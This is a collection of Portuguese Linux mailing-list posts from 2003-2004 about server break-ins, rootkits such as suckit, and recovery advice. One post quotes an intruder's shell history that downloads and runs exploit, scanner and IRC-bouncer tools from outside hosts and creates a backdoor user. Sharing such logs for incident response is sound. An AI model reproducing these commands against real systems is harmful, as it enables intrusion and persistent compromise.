anormalidade. O log do iptables também não achou nada incomum, além de alguns pacotes ICMP e a porta 60922. A porta 60922 foi utilizada para rodar um ishd (clone do ssh) escutando nela. E também rodou um serviço chamado sendmeil. Encontrei os seguintes diretórios instalados pelo rootkit: [root@sardinha s]# pwd /dev/rd/s [root@sardinha s]# ls -la total 748 drwxr-xr-x 2 root root 4096 Apr 23 06:05 . drwxr-xr-x 5 root root 32768 Apr 23 02:34 .. --w------- 1 root root 656 Apr 23 02:34 config --w------- 1 root root 527 Apr 23 02:34 hostkey --wx--x--x 1 root root 25 Apr 23 02:34 icmp --wx--x--x 1 root root 17628 Apr 23 02:34 ishd --wx--x--x 1 root root 50 Apr 23 02:34 load --w------- 1 root root 512 Apr 23 02:34 random --wx--x--x 1 root root 665087 Apr 23 02:34 sendmeil --w------- 1 root root 681 Apr 23 02:34 sshd_config --w------- 1 root root 528 Apr 23 02:34 ssh_host_key --w------- 1 root root 332 Apr 23 02:34 ssh_host_key.pub --w------- 1 root root 512 Apr 23 02:34 ssh_random_seed E o diretório: [root@sardinha b]# pwd /dev/rd/b [root@sardinha b]# ls -la total 536 drwxr-xr-x 2 root root 4096 Apr 23 02:34 . drwxr-xr-x 5 root root 32768 Apr 23 02:34 .. -rwxr-xr-x 1 root root 6612 Apr 9 2002 chattr -rwxr-xr-x 1 root root 46888 Apr 23 02:34 dir -rw-r--r-- 1 root root 5002 Apr 23 02:34 dir.help -rwxr-xr-x 1 root root 26248 Apr 23 02:34 du -rw-r--r-- 1 root root 1467 Apr 23 02:34 du.help -rwxr-xr-x 1 root root 62182 Apr 23 02:34 find -rw-r--r-- 1 root root 1081 Apr 23 02:34 find.help -rwxr-xr-x 1 root root 46888 Apr 23 02:34 ls -rwxr-xr-x 1 root root 5588 Apr 9 2002 lsattr -rw-r--r-- 1 root root 5001 Apr 23 02:34 ls.help -rwxr-xr-x 1 root root 100173 Apr 23 02:34 netstat -r-xr-xr-x 1 root root 63304 Apr 23 02:34 ps -rwxr-xr-x 1 root root 11976 Apr 23 02:34 pstree -rwxr-sr-x 1 root root 25020 Apr 23 02:34 slocate -rwxr-xr-x 1 root root 46888 Apr 23 02:34 vdir -rw-r--r-- 1 root root 5003 Apr 23 02:34 vdir.help Além disso alterou alguns scripts do init.d. Gostaria de obter maiores informações sobre COMO esse rootkit entrou aqui no meu sistema, alguém poderia me ajudar? sendmail 8.11.6 bind 9.2.0 apache 1.3.23 gnu-pop3d 0.9.8 openssh 3.1p1 Além desses serviços acima tem o tradicional portmap, xinetd. Essa máquina estava com a instalação temporária (padrão), e a única proteção extra eram algumas regras do iptables. Será reinstalada e tomada devidas precauções. Porém a dúvida permanece... como diabos ele infectou o meu sistema? Buffer-overflow do sendmail? bind? algum exploit? Ele nunca se logou no sistema ANTES da infecção pelo menos. Saudações, Ronaldo Saheki ******************************************** De: Marcus Lima Responder-a: marcuslima@marcuslima.eti.br Para: Ernandes S. Pereira , linux-br@bazar.conectiva.com.br Assunto: (linux-br) RES: (linux-br) Intruso ! Data: 18 May 2003 09:40:57 -0300 > Gostaria de saber, como eu fico sabendo se alguem tentou entrar na maquina, > e por onde tentou ! > se entrou aonde mexeu, etc.. > minha maquina esta com o CL8 e com speedy Nesse caso o iptables não vai te ajudar. Instale um IDS que fará o que você deseja (IDS = Intrusion Detection System) Procure por AIDE e Snort entre outros brinquedinhos... :) - Marcus Lima. ******************************************** De: rubens_alves2000 Responder-a: hardbr@yahoogrupos.com.br Para: hardbr@yahoogrupos.com.br Assunto: [Hardware-BR] news: Servidores Linux sao os mais invadidos por hackers Data: 04 Jun 2003 23:38:23 +0000 ... Servidores Linux viram alvo de hackers Um relatório divulgado ontem pela firma de segurança britânica Mi2g aponta que os servidores Linux viraram o alvo favorito de hackers. De acordo com a empresa, o descuido dos usuários com o sistema é o principal fator da tendência. De acordo com a Mi2g, foram 19.208 servidores Linux invadidos nos últimos três meses. Quando se fala de máquinas com Windows, a relação cai para 3.801. A explicação para os números de acordo com a empresa de segurança é a própria cultura dos administradores de rede [que imaginam que o Linux nao tem as vulnera- bilidades do Windows]. E outra: quando as empresas adotam o pinguim, ficam satisfeitas pelo fim do ônus das licenças. Porém, geralmente deixam de investir também em segurança. [fonte: Magnet] ******************************************** De:  Rodrigo Lima Para:  lista-linux@sangiovanne.com.br Cc:  linux-br@bazar2.conectiva.com.br Assunto:  Re: (linux-br)rootkit - placa de rede promiscua Data:  Wed, 16 Jul 2003 20:01:54 -0300 Pois é, descobri mais algumas coisinhas hoje sobre isso! Não teve jeito mesmo, tive que formatar o hd e instalar tudo novamente. Eu não tenho firewall nesse servidor, pois ele não fica conectado a uma ADSL, ele só conecta durante uns 5 minutos com modem :-), claro que depois do que aconteceu criei algumas regrinhas com iptables. Bom, depois de ter formatado e reinstalado tudo novamente, eu conectei e fiquei verificando os logs e pelo netstat,e para minha surpresa recebo um ataque e logo após a conexão é redirecionada para um site web e desse site é que vem o script que contamina o sistema! Só que eu desabilitei todos os serviços no servidor antes de conectar, então o script não conseguiu alterar nada no servidor, mas pelos logs ele ficou tentando um bom tempo! Eu só queria saber uma coisa, como que em 5 minutos o cara ou sei lá quem achou meu ip que é dinâmico e tentou colocar o script novamente??? Muito estranho! Alguém usa o no-ip? Tô achando que os caras estão rastreando os domínios do no-ip, só pode ser isso, por que o no-ip atualiza o DNS de 5 em 5 minutos, e é mais ou menos esse tempo que o servidor leva para começar a ser invadido! não pode ser coincidência! :-) Ah, só pra complementar, não fazia idéia que existia esse tipo de invasão em sistemas Linux, foi muita surpresa pra mim, com certeza vou ter que estudar mais sobre segurança! Falou! > Amigo, BemVido ao clube DeDaDa, tive um prob parecido > na minha maq tinha um tal de suckit instalado e ele est ava no > rcX.d   em todos dos niveis.  eu tambem desconfiei pelo  grep > pois meu firewall   nao conseguia pegar os ips das eth' s > > Depois de dois meses mais ou menos eu reinstalei esta m aq > foi ontem por sinal, eu consegui pegar algums rastros d o Hacker > e ate o site dele e o mas legal  ele deixou no site del e meus arquivos > de passwd e shadow,,, > ******************************************** De:  Marcus Lima Responder-a:  marcuslima@marcuslima.eti.br Para:  Rodrigo Lima , lista-linux@sangiovanne.com.br Cc:  linux-br@bazar2.conectiva.com.br Assunto:  RES: (linux-br)rootkit - placa de rede promiscua Data:  Thu, 17 Jul 2003 08:45:29 -0300 Olá Rodrigo,         Não é coincidencia, seja quem for que está tentando te invadir está vindo pelo seu domínio (é muito improvavel que ele descubra seu IP de outra forma).         Agora, Linux é o parque de diversão dos Wannabe, Script Kiddies e até mesmo os verdadeiros 'hackers black hat'. Você acha realmente que o pessoal não fica ligado nas falhas do mesmo?         Bom, tudo que você precisa é estudar mais sobre segurança e até lá se manter atualizado. Se tiver alguma religião, ore para o seu Deus. - Marcus Lima Consultor de Segurança Aker Security Solutions - Regional RJ/ES www.aker.com.br ******************************************** De:  Rauklei P.S. Guimarães Para:  filipe@montreal.com.br Cc:  linux-br@bazar.conectiva.com.br Assunto:  Re: (linux-br)rootkit - placa de rede promiscua Data:  Thu, 17 Jul 2003 09:49:32 -0300 On 17 Jul 2003 08:58:28 -0300, Filipe Dantas wrote > > Ah, só pra complementar, não fazia idéia que existia > > esse tipo de invasão em sistemas Linux Olá! Passei por este tipo de problema também em um servidro RedHat 7.3. Na minha situação o cara invadiu "aparentemente" pelo ssh que na versão que acompanha o RedHat 7.3 existe sérios bugs. O cara alterou o aplicativo atd que é utilizado pelo cron, criou um usuário, porém ele deixou rastro, vejam uma parte do que ele fez: cd /var/tmp cd scan mkdir atd cd atd ls wget warriorwarrior.net/erosbot.tgz tar xzvf erosbot.tgz tar xzvf erosbot.tgz rm -rf erosbot.tgz rm -rf erosbot.tgz cd emach ./mech ./mech ./mech cd .. cd // cd .. cd /var/tmp/scan ./superwu 63.204.202.171 21 ./superwu 155.158.11.181 21 ./superwu 195.83.116.56 n21 ./superwu 195.83.116.56 21 cd /var/tmp/scan ./superwu 213.25.247.48         21 ./superwu 203.34.168.106 21 cd /var/tmp cd /var/tmp/scan cd /tmp wget www.syder.home.ro/r.tgz wget www.campia-turzii.as.ro/rh.gz tar zxvf rh.gz cd a ./rh73 cd /var/tmp/scan ./superwu 208.235.198.197 21 ./superwu 202.186.101.152  21 ./superwu 218.97.179.101   21 ./superwu 204.188.184.20 21 cd /tmp wget www.geocities.com/adytza_guritza/bnc.tgz tar xzvf bnc.tgz cd psybnc mv psybnc crond export PATH=:PATH crond cd /var/tmp cd sca/atd cd scan/atd cd emach ./mech ---------------- olha isso que ele fez ----- /usr/sbin/adduser ares passwd ares socklist killall -9 superwu nmbd mech portmap dhcpd socklist kill -9 7469 7819 503 1692 7770 6786 7562 1692 6256 6383 6256 7343 7469 851 socklist kill -9 7467 724 743 725 6173 776 1069 776 socklist kill -9 7829 socklist killall -9 mech socklist /usr/sbin/adduser ares rm -rf ares /usr/sbin/adduser ares ps ax echo anonymous >>/etc/ftpusers echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all /sbin/iptables -I INPUT -p tcp --dport 443 -j DROP /sbin/ipchains  -A input -p tcp -s 0/0 -d 0/0 443 -j DENY /etc/rc.d/init.d/httpd reload ------------------------ O infeliz sabe bem o que faz. E o que aparenta é que existe alguns furos no RedHat7.3 que são testados por um dos aplicativos. Alguem conhece estes aplicativos que ele compilou ? Bom, para me livrar do cara "reforcei" o firewall e retirei o ssh do "ar", já tem algumas semanas que tudo vem correndo bem. Vou baixar um destes aplicativos que ele baixou pelo wget e tentar analisar o que eles fazem e qualquer novidade compartilho com a galera. Ogrigado pela atenção!! Rauklei P.S. Guimaraes ----------------------- Sistemas CORDON Ltda  scordon@scordon.com.br www.scordon.com.br ******************************************** De:  Rodrigo Lima Para:  linux-br@bazar.conectiva.com.br Assunto:  (linux-br)rootkit - placa de rede promiscua Data:  Tue, 15 Jul 2003 22:13:17 -0300 Olá pessoal, quero partilhar aqui na lista o que me aconteceu hoje e no qual fiquei com muita dor de cabeça :-( Bom, tenho em alguns clientes servidores que rodam Red Hat 8 e as estações usam boot remoto. Bom, hoje quando fui instalar alguns scripts de conexão caracter em dos servidores me aconteceu uma coisa estranha. Logo após ter efetuado a conexão via ppp0, quando eu dava algum comando utilizando o grep me dava a seguinte mensagem: segmentation Fault. Achei estranho isso, mas não dei muita bola na hora, logo após eu reiniciei o servidor, e pra minha surpresa o servidor não foi mais iniciado, dando erro em vários arquivos de inicialização e todos apareciam erros com o comando grep. Pensei em milhões de coisas, mas não tinha nenhuma idéia, pensei em remover o grep e instalar novamente, mas havia muitos pacotes que dependiam dele. Olhei no meu micro o tamanho do meu arquivo /bin/grep e pra minha surpresa o arquivo que estava no servidor era maior que o meu e a data do arquivo estava como 15-07, ou seja, HOJE! Bom, aí eu pensei, vou copiar meu arquivo e coloca- lo no servidor, beleza, fiz isso e pra minha surpresa o arquivo foi alterado seu tamanho novamente, aí eu não entendi mais nada! Logo após, analisando os logs verifiquei que a placa de rede e o ppp0 estavam como promiscuous mode, aí eu senti a maldade! Verifiquei outros arquivos e vários haviam sido alterados os seus tamanhos e todos com 4k a mais do que o normal, até o arquivo de kernel havia sido alterado! Moral da história: aprendi que no linux também há cavalo de tróia! E bem chato por sinal! Gostaria de saber se alguém já teve alguma situação parecida e poderia me dar alguma explicação de como isso pode ter acontecido e qual a melhor solução! derrepente alguém já tenha passado por isso, desculpe o email muito longo, talvez até seja moderado, mas achei importante essa mensagem! abraços! Rodrigo de Lima Silva Analista de Suporte ******************************************** De:  Brunhara Para:  linux-br@bazar.conectiva.com.br Assunto:  (linux-br) Lista ou site de seguraça em portugues, alguem pode indicar??? Data:  Thu, 3 Jul 2003 11:03:15 -0300 Ola Lista..... Estou precisando de um indicaçoes de site de segurança, problema descrito abaixo: Eu uso o cl8.0 e estava com as atualizaçoes do apt-get acredito que nao seija as ultimas mas pelo menos de dois meses atrás.. Minha maq foi envadia e o hacker  usou nao sei o quê para poder criar um usuario comum (parece que foi uma fraqueza do apache) depois ele rodou um programa PTRACE e virou route, catou passwd e shadow, e até a pouco tempo esta no site dele... agora esta os arquivos de outra vitima Ele deixou, na maq suckit 1.3.b, xp.txt x2.tgz etc... nunca tinha estudado ferramentas de hacker, ate gostei de perder um tempo com isto, instalei o lkm-antiptrace.sh removi o suckit e outras coisas mais, coisas do desleicho. e é claro o basico troquei todos as senha e tirei shell de quem nao precisava. Nao tive corragem de denunciar o site dele pois,, fique com medo da retalhaçao caso a denuncia nao funciona-se.. na promeira invasão achei que ele era amador mas as duas ultimas,, hummm.. o mais engraçado  ele baixo de um site o john-1.6.tar.gz  e la tem um artigo com algumas iniciais que o identifica eu acho.. Estou agendando um dia para formatar a maq, para diminuir a dor de cabeça. ******************************************** De:  ccm Cc:  linux-br@bazar.conectiva.com.br Assunto:  (linux-br) Invasões a sistemas Linux batem recorde Data:  Mon, 09 Jun 2003 13:07:26 -0300 Invasões a sistemas Linux batem recorde em maio   da Folha Online O número de ataques hackers a máquinas rodando o sistema operacional Linux bateu recorde em maio. De acordo com a empresa de segurança mi2g, o mês registrou 19.208 invasões bem-sucedidas em todo o mundo contra esses sistemas --o maior índice de ataques a Linux da história. Enquanto isso, as invasões aos servidores Windows perderam intensidade. A empresa contabilizou 3.801 invasões contra essas máquinas, enquanto outros sistemas operacionais sofreram 2.275 ataques em maio. Os Estados Unidos e Reino Unido foram os mais atacados, principalmente como resultado da guerra no Iraque. Durante o auge da epidemia do vírus virtual Slammer, em janeiro, o Windows foi dono de 53% das invasões hackers, contra 34% dos ataques registrados pelo Linux. Mas de lá para cá, o cenário foi sofrendo alterações e a diferença entre a quantdade de ataques aos diferentes sistemas ficou quase imperceptível. Os dados do Zone-H, um site com registros de invasões hackers, nos últimos meses também indicam uma aproximação entre os números de ataques a sistemas Linux e Windows, dificultando a identificação de qual deles têm sofrido mais. Razões DK Matai, presidente da mi2g, disse que há três motivos básicos para o crescente número de ataques bem-sucedidos aos sistemas Linux. O primeiro deles é o gerenciamento de configurações. "Conforme as ferramentas automáticas de ataques estão se popularizando, a segurança on-line dos sistemas fica mais dependente de seus ajustes e da rápida atualização de eventuais falhas", explica. Depois, está a falta de iniciativas em prol da segurança dos computadores, com a que a Microsoft vem tentado implantar --Trustworthy Computing. Por causa da natureza dos sistemas Linux --de código aberto--, não há pontos de referência, com informações úteis para o gerenciamento e segurança de servidores, disse Matai. O executivo conclui que o terceiro principal motivo para o crescente número de   invasões ao Linux está na falsa idéia de que o sistema por si só significa economia para as empresas. Matai alerta que a escolha de software livre não é suficiente se as empresas não tiverem boas políticas e especialistas para a segurança das máquinas. Segundo ele, é preciso investir em treinamento. "Muitas pessoas acreditam que o simples fato de usarem o sistema operacional de código aberto significa que ******************************************** De:  Marcus Lima Responder-a:  marcuslima@marcuslima.eti.br Para:  andremsc@ieg.com.br, linux-br@bazar.conectiva.com.br Assunto:  (linux-br) RES: (linux-br) Invasão Data:  Sat, 24 May 2003 09:09:14 -0300 Se não houver compartilhamento não é possível. A não ser que o usuário em questão faça uso de algum exploit para ganhar acesso no servidor local. Neste caso, fique atento aos seus usuários mais espertinhos e mantenha sempre seu servidor atualizado. - Marcus Lima. -----Mensagem original----- De: linux-br@bazar.conectiva.com.br [mailto:linux-br@bazar.conectiva.com.br]Em nome de andremsc@ieg.com.br Enviada em: quarta-feira, 21 de maio de 2003 15:29 Para: linuxall@yahoogrupos.com.br; linux-br@bazar.conectiva.com.br Assunto: (linux-br) Invasão Olá Grupo Alguém sabe me dizer se é possível acessar uma maquina na rede local sem compartilhamento ??? Se possível, Como o usuário faria e como fazer para se defender ??? Valeu ******************************************** De:  Marco Aurélio P. de Carvalho Para:  Lista (Rede-L) , thiarlles Assunto:  Re: [Redes-l] Invadir via FTP!!!!!! Data:  Fri, 1 Aug 2003 09:52:10 -1200 Bem Thiarles, e dificiu não pensar que vc não quer um receita de bolo para esse tipo de invasão. Muitas paginas "hackers" espalhadas pela internet sempre falam da tal invasão por ftp, mas a verdade é que as tecnicas mencionadas já estáo super ultrapassadas, sem falar que existe hoje dezenas ou talvez centenas de programas de servidores de FTP. Se vc ficar ligado em sites de segurança como www.linuxsecurity.com.br, www.linuxsecurity.com, www.cert.com vc sempre verá, principalmente no cert relatos de falhas de segurança, inclusive sobre o FTP. Se vc quer fazer um ataque do tipo vc tem q saber qual o deamon que roda do outro lado, e saber se ele tem alguma vulnerabilidade e tentar explorar essa vulnerabilidade, receitas de bolo são para scripts kids, espero q vc não queira ser um, sites serios sobre segurança quando divulgam algum exploit (o q e muito raro) dilvulgam o mesmo com bugs, dessa forma quem for executar o exploit deverá saber programar e tb saber o q está fazendo e o q está explorando. Se vc quer se especializar em segurança procure sobre sites de segurança e não sites de "hackers"             Marco Aurélio > Olá amigos da lista tudo bem? > gostaria de saber de voces;como se faz pra invadir um sistema via > FTP,não que eu queira invadir,he he he > Mas já sei(ou acho que já sei)me defender contra esse ataque. > Gostaria de um toque a respeito. > Como faço pra invadir,JURO QUE NÃO INVADIREI > E como faço pra saber se a minha defesa contra esse tipo de ataque está > bem cnfigurada. > Abs a todos > :-) ******************************************** De:  Antonio Claudio Para:  Lista Linux - SuperIP , Linux-BR Assunto:  Re: (linux-br)Interface eth0 entrando em modo PROMISC Data:  Fri, 5 Dec 2003 18:55:50 +0000 > pergunto alguem tem alguma solucao tanto para o modo promiscuo como para o > outro? Provavelmente você não vai ter como determinar quais foram os estragos provocados pelo invasor, e mesmo se tivesse, o ideal seria formatar e instalar novamente. Isto vai garantir uma máquina novamente confiável. []'s Antonio Claudio ******************************************** De:  Tiago Bortoletto Vaz Para:  seguranca@distro2.conectiva.com.br Assunto:  Re: [seguranca] rootkit suckit (sk12) Data:  Wed, 8 Oct 2003 14:47:12 -0300 (BRT) Olá, ele tem um desinstalador próprio. Ele instala um keylogger também carregando um módulo se não me engano. Outra coisa, pra evitar outro ataque desse rootkit tire todas as permissões do /dev/kmem. Sugiro que refaça a instalação do seu sistema, mas antes pode fazer uma auditoria usando o TCT pra tentar rastrear o intruso. Provavelmente seus arquivos (ps, ls, top...) foram comprometidos também. tiago > >       Olá Pessoal, > >       Hoje tive uma máquina invadida, e foi instalado o sk12. > Consegui desinstala-lo parcialmmente, pois no reboot as nic não > levantam, e quando levantadas na mão, elas entram em modo promiscuo. > Alguem tem alguma dica de como desinstalar esta praga?? > >       Agradeço antecipadamente. De:  Halley Souza Para:  seguranca@distro2.conectiva.com.br Assunto:  Re: [seguranca] rootkit suckit (sk12) Data:  Wed, 8 Oct 2003 15:19:09 -0300 O suckit faz uma copia dele pro /sbin/init, mas faz tambem uma cópia do init original dentro no /sbin/init provalmente você não visualizará esta cópia até desisntalar o suckit, para isso veja o diretorio do rootkit # strings /sbin/init | grep HOME Entre la, renomeia o arquivo "sk" para um nome qualquer e execute-o, escolha a opção de desinstalar Teoricamente é isso ! []s Halley Souza > > Olá Pessoal, > > > > Hoje tive uma máquina invadida, e foi instalado o sk12. > > Consegui desinstala-lo parcialmmente, pois no reboot as nic não > > levantam, e quando levantadas na mão, elas entram em modo promiscuo. > > Alguem tem alguma dica de como desinstalar esta praga?? > > > > Agradeço antecipadamente. ******************************************** De:  Silmar A. Marca Para:  minetto@unochapeco.rct-sc.br Cc:  seguranca@distro2.conectiva.com.br Assunto:  Re: [seguranca] Bug ou Invasão? Data:  Fri, 29 Aug 2003 19:42:28 -0300 Camarada, é completamente normal isto. Se vc deu permissão pro www, www exclui uai... Muitos servidores sao "invadidos" por isto... Nao faca isto.. use tudo via bd que é mais seguro! Ou, mude o owner de www para webmaster, o grupo pra www e apenas nos arquivos especificos abilite a opcao w para o grupo, a fim de minimizar problemas. Outra coisa, habilite o safe mode! Cordialmente, Silmar A. Marca GrupoGSN - Desenvolvimento, Implantação e Verificação de Servidores Profissionais baseados em Linux/Novell http://www.grupogsn.com.br/~marca/ ------------------------------------------------------------ Se algo não lhe faz mal (fisico, moral ou psicologicamente), experimente! O máximo e você perder tempo! E tempo, e o que você tem a vida toda pra perder..... Mais vale um instante de prazer que uma eternidade fútil! ------------------------------------------------------------ Citando Elton Luís Minetto : > Oi.Estou tendo um problema estranho. Tenho um Conectiva 8 com Apache > atualizado rodando. No servidor existiam alguns arquivos cujo dono era o > www, para poderem ser gravadas via php. Hj todos esses arquivos foram > excluidos do servidor. Será um bug ou uma invasão? Nos logs do Apache não > encontrei nada. > Aliás, colocar os arquivos com permissão de escrita para o www é o > correto? Existe algum outro método de permitir que os arquivos sejam > gravados pelas aplicações php? ******************************************** De:  Andreas Para:  seguranca@distro2.conectiva.com.br Assunto:  Re: [seguranca] Invasões realizadas em 2003 Data:  Fri, 9 Jan 2004 16:39:28 -0200 On Fri, Jan 09, 2004 at 06:35:17PM +0000, Hermann Wecke wrote: > lembre-se que invadir uma máquina seguindo um script (o chamado > "script-kiddie") não é ser hacker... Sejam script-kiddies ou não, causam prejuízo. ******************************************** De:  André Luiz Rodrigues Ferreira Para:  seguranca@distro2.conectiva.com.br Assunto:  Re: [seguranca] segurança] Data:  Fri, 27 Feb 2004 08:24:07 -0300 seguranca-bounces@distro2.conectiva.com.br wrote: On Thu, 26 Feb 2004, Eduardo wrote: > > > > Gostaria de saber quais arquivos de log auditar no caso de uma invasão? > > Por onde começar? > > > > > > > Nao acredito que exista uma receita de bolo única para este tipo de ação. > E cada resposta que for colocada nesta lista abordará o assunto de uma > forma. O arquivo /var/log/messages PODE trazer boas informações. > > Método radical: arrancando o cabo de rede, NÃO desligando a máquina, estar > preparado para saber o que vai fazer para fazê-lo o mais rápido possível > (não perder "evidências" para conseguir reproduzir os passos) e só então > desligar o sistema. > > > > > Como deixar meu sistema mais seguro? > > > > > > > Comece por tê-lo sempre atualizado e por não usar "buracos" > reconhecidamente problemáticos (FTP, SMTP bichado SSH antigo...). > > A "máxima" entre os investigadores é que, depois de uma invasão, o seu > sistema terá todos os patches/atualizações aplicadas, já que o invasor não > quer ninguém mais como companhia naquela máquina. Nem você. > > Se permitir o acesso por SSH/Telnet/FTP, limite-o apenas aos IPs > necessários/reconhecidos sempre que possível. > > Em último caso, depois da porta arrombada e do estrago feito, entre em > contato com o NBSO/NIC-BR. Eles poderão ajudá-lo. > ________________________________________________________ > Lista seguranca > seguranca@distro2.conectiva.com.br > http://distro2.conectiva.com.br/mailman/listinfo/seguranca > > > Recomendo utilizar também uma solução de HIDS (Host Intrusion Detection System). Temos vários software livres que fazem verificação de integridade de arquivos especificados, indicando qualquer alteração ou exclusão suspeita, além de poder verificar mensagens suspeitas em arquivos de logs, podendo emitir alertas para o administrador. Dê uma olhada no Tripwire (http://www.tripwire.org) , AIDE (http://www.cs.tut.fi/~rammer/aide.html) e LogCheck (www.linux-sxs.org). Forte abraço... -- Na paz, Andre Luiz Rodrigues Ferreira Coop. Agricultores Regiao Orlandia Orlandia - SP - Brazil TI Division - Support Technician - Networking / Linux / Information Security Fan- alrferreira@carol.com.br - http://freecode.linuxsecurity.com.br ******************************************** De:  Ricardo Castanho de Oliveira Freitas Para:  linux-br@bazar2.conectiva.com.br Assunto:  (linux-br) AJUDA contra Script Kids usando linux para defacing! =>Fwd: Re: I need help from Brazil Data:  Sat, 13 Mar 2004 13:00:56 -0300 Olá Pessoal Recebi esta mensagem solicitando ajuda e encontrei no link (http://planeta.terra.com.br/informatica/defacer/cgi), um executável em elf* Que felizmente não afetou meu sistema, mas afetou sistemas com RedHat (não tenho maiores detalhes). Alguém poderia verificar se REALMENTE se trata se um script MALICIOSO/PERIGOSO. para que possamos tomar as devidas providências? Programação não é a minha área! Agradeço qualquer informação. abs, Ricardo Castanho ----------  Forwarded Message  ---------- Subject: Re: I need help from Brazil Date: Saturday 13 March 2004 10:08 From: Muhammed DAUD To: Ricardo Castanho de Oliveira Freitas Hi thank you very much for your reply. Id rather prefer to dizcover what holes I have in my server cz those kids  might transfer tere scripts to any other place if you want I send you the binary I found . one of the binaries is alredy in that url . the other binary called local4. how can u help? regards Quoting Ricardo Castanho de Oliveira Freitas : > On Saturday 13 March 2004 15:09, you wrote: > > Hello! > > I'm sorry our "kids" are putting you on troubles! > They use the same server I use: www.terra.com.br > It belongs to TELEFONICA (Spanish company). > > Send email with full logs to: abuse@terra.com.br > > This server is one of the biggest in Brazil, but .... usually they are not > very helpfull. > > If you don't get any results, email me back, I  will try other channels > like > > the: > http://registro.br > > They are one the biggest Internet "notary" services. They control almost > 100% > > of the brazilian domains name. > > They are quite serious on their job, unlike TERRA.com.br. > > Sometimes I think TERRA is too big to worry about "our" problems. > > Hope to help, > > Ricardo Castanho > > > Hi > > I found you mail in securityfocus.com. my server has been hacke 2 times > > within 3 months by brazilian kids . I don know how they manage to do it. > > all I found in my servers log is some thing like this > > --21:10:45--  http://planeta.terra.com.br/informatica/defacer/cgi > >            => `cgi' > > Resolving planeta.terra.com.br... done. > > Connecting to planeta.terra.com.br[200.176.2.133]:80... connected. > > HTTP request sent, awaiting response... 200 OK > > Length: 17,874 [text/plain] > > > >     0K .......... .......                                    100% > > 44.99 KB/s > > > > 21:10:49 (44.99 KB/s) - `cgi' saved [17874/17874] > > > > > > then I found they got my root pass and I have to rebuild all of my > > server .. > > I use redhat with latest kernel an apache. > > can you help me? > > or at least direct me to some one who can > > regards > > > > > > > > > > > > > > Muhammed DAUD > > Kilavuz.net > > tel: 224-225 4627 > > faks: 224-225 4629 > > -- > ========================================================== > Linux user # 102240 => Seti@home user => 100% M$ FREE > ========================================================== ******************************************** De:  Marcelo Vivan Borro Para:  linux-br@bazar2.conectiva.com.br Assunto:  Re: (linux-br) Socorro! Meus diretorios /tmp e /var/tmp viraram a casa da mae Joana! Data:  Sun, 30 May 2004 00:20:24 -0300 -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Em Sáb 29 Mai 2004 18:47, Garak escreveu: > > Pessoal, ja to desesperado e de s@co cheio. > Meus diretorios /tmp e /var/tmp viraram a casa da mae Joana MESMO! > Quase todo dia eu encontro porcarias instaladas lá... geralmente programas relacionados a IRC como o bnc e coisas do tipo. Na minha opinião, a solução mais rápida, prática, segura e acredite, que vai te dar menos trabalho, é instalar tudo novamente. Você não tem mais como garantir a integridade do sistema. De uma olhada nos seus logs do sistema para encontrar como a invasão estava ocorrendo. Faça um backup de todos dados e arquivos de configuração e instale seu servidor a partir do zero (uma distro atualizado por favor).  Depois de instalado, atualize tudo que estiver disponível oficialmente da sua distro, como um apt-get dist-upgrade em um Conectiva. Verifique todos os arquivos de configuração antigos quanto à possíveis falhas. Se estiverem ok, podem ser usados como base dos novos. Refaça o seu firewall e instale alguma ferramenta de detecção de intrusão. - -- Marcelo Vivan Borro Linux User # 277064 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.3 (GNU/Linux) ******************************************** De:  Jorge Godoy Para:  Aguiar Magalhaes Cc:  linux-br@bazar2.conectiva.com.br Assunto:  Re: (linux-br) O que são programas LKM Data:  Wed, 01 Dec 2004 17:50:11 -0200 Aguiar Magalhaes writes: > Estou falando de trojans LKM, mas não estou sabendo > como eliminá-los, veja: Se a máquina foi comprometida, a única maneira é reinstalando-a e recuperando os backups.  Qualquer outro método que envolva programas da própria máquina ou que mantenha arquivos de configuração ou binários ou ... da máquina pode levar a outro comprometimento da máquina. -- Godoy.     ******************************************** De:  Thiago Macieira Para:  linux-br@bazar2.conectiva.com.br Assunto:  Re: (linux-br) O que são programas LKM Data:  Thu, 2 Dec 2004 15:11:25 -0200 -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Aguiar Magalhaes wrote: >existe alguma forma de evitar a instalação destes >rootkits via firewall ou outro método ? Firewalls, programas mais novos/seguros, menos serviços. Mantenha sua instalação sempre atualizada, com as últimas correções de segurança. >O que o hacker deseja ao instalar estes rootkits ? Manter facilmente o acesso que ele já conseguiu e esconder de você o fato. - --   Thiago Macieira  -  Registered Linux user #65028    thiago (AT) macieira (DOT) info ******************************************** De:  Carlos Carvalho Para:  linux-br@bazar2.conectiva.com.br Assunto:  Re: (linux-br) O que são programas LKM Data:  Thu, 02 Dec 2004 15:47:57 -0200 -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Aguiar Magalhaes wrote: |>Se a máquina foi comprometida, a única maneira é |>reinstalando-a e | | | Godoy, | | existe alguma forma de evitar a instalação destes | rootkits via firewall ou outro método ? | | O que o hacker deseja ao instalar estes rootkits ? | | |        Godoy deve responder mas tambem vou: Ele deseja utilizar sua maquina para algum fim, dentre eles: ponte para outros ataques; capturar informacoes pessoais; instalar proxy de irc; usar a maquina como testes para futuras invasoes; ou talvez ele nem sabe o que quer realmente, ja que na maioria das vezes o ataque e feito por alguem sem nenhum conhecimento, que segue receitas pre-formatadas de bolo; ou ele quer apenas se divertir... Instalar uma versao mais recente de um sistema operacional nao resolve nada se voce nao configura-la corretamente e nao aplicar os patches necessarios. Re-instalar a maquina acredito ser o mesmo que trocar de carro porque amassou o paralamas. As vezes e mais negocio voce consertar o paralamas e tentar descobrir por onde o "hacker" acessou sua maquina, que vulnerabilidade ele explorou, se e algo com php, algum servidor vulneravel a overflow ou senhas fracas. Assim voce inclusive ganha conhecimento, sabendo como o "inimigo" ganhou acesso ao seu equipamento voce pode se prevenir melhor numa futura tentativa de invasao. - - Aplique todos os patches: php, apache, dns, mail, ssh , etc e tal. - - verifique com nmap se nenhuma porta estranha esta aberta, use fuser ou lsof como auxilio. - - boa sorte. "\x66\x6c\x6f\x77\x73\x65\x63\x75\x72\x69\x74\x79"; Time is nature's way of making sure that everything doesn't happen at once. - - SlackWare user #349702 ******************************************** De:  Jorge Godoy Para:  Aguiar Magalhaes Cc:  linux-br@bazar2.conectiva.com.br Assunto:  Re: (linux-br) O que são programas LKM Data:  Thu, 02 Dec 2004 14:54:38 -0200 Aguiar Magalhaes writes: > existe alguma forma de evitar a 